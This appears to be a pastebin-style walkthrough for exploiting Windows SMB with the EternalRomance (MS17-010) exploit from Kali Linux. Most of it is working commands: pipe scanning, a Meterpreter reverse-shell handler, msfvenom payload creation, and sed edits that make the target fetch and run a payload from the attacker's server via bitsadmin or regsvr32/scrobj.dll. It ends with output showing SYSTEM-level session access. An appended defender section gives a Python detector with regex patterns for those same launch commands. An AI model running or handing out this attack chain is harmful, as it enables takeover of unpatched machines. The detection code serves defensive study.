hackernix

NSA's EternalRomance exploiting from Kali Linux

Feb 19th, 2018
#1. – Test Target IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

*choose any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc…

#2 – Create Metasploit Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

#3. – Grab Exploit Scripts in console 2
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py

#4a. – Payload Choice #1 – Create EXE payload using bitsadmin dl and execute
# $IP must be set in this console before msfvenom and sed use it
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

#4b. – Payload Choice #2 – Create SCT payload with regsvr32 dl with scrobj.dll
git clone https://github.com/CroweCybersecurity/ps1encode .
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py

Credits for this regsvr32 payload idea: Sheila Berta / Casey Smith / CroweCybersecurity

#5. – Start Webserver
service apache2 start

##################################
# Exploit it (change the TargetIP and named pipe if you want)
python EternalRomance.py [TargetIP] netlogon

If all goes well a shell shall rain down on ya.
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
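Added here as a defender-side example, not part of the original paste: a small Python detector over constructed process-creation records that flags the two payload launch shapes used above (bitsadmin download-and-run, and regsvr32 pulling a remote .sct through scrobj.dll) and raises severity when the process was spawned by services.exe as SYSTEM, which is what a service-based launch like service_exec produces. The record field names, hostnames and IPs are constructed, not taken from real telemetry.

```python
import re

# Constructed sample process-creation records, loosely shaped like Windows
# event 4688 / Sysmon Event ID 1 fields. Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": r"NT AUTHORITY\SYSTEM", "parent": "services.exe",
     "cmdline": r"cmd /c bitsadmin /transfer wcb /priority high http://192.0.2.10/1.exe C:\1.exe && C:\1.exe"},
    {"host": "ws02", "user": r"NT AUTHORITY\SYSTEM", "parent": "services.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://192.0.2.10/1.sct scrobj.dll"},
    # Benign-looking bitsadmin use: a download with no chained execution.
    {"host": "ws03", "user": r"CORP\jdoe", "parent": "explorer.exe",
     "cmdline": r"bitsadmin /transfer job1 https://updates.example.com/patch.msi C:\temp\patch.msi"},
    # Ordinary local COM registration, no remote scriptlet.
    {"host": "ws04", "user": r"NT AUTHORITY\SYSTEM", "parent": "msiexec.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
]

# One rule per payload choice in the writeup: bitsadmin fetching over HTTP
# and immediately running the file (&&), and regsvr32 given an http(s) /i:
# argument together with scrobj.dll.
RULES = [
    ("bitsadmin_download_then_exec",
     re.compile(r"bitsadmin\s+/transfer\b.*https?://\S+\s+\S+\s*&&", re.I)),
    ("regsvr32_remote_sct_scrobj",
     re.compile(r"regsvr32\b.*\s/i:https?://\S+.*\bscrobj\.dll", re.I)),
]


def classify(event):
    """Return the names of all rules whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def scan(events):
    """Return (host, rule, severity) alerts. Severity is 'high' when the
    parent is services.exe and the user is SYSTEM, the combination a
    remotely created service produces; otherwise 'medium'."""
    alerts = []
    for ev in events:
        for rule in classify(ev):
            via_service = (ev["parent"].lower() == "services.exe"
                           and ev["user"].upper().endswith("SYSTEM"))
            alerts.append((ev["host"], rule, "high" if via_service else "medium"))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```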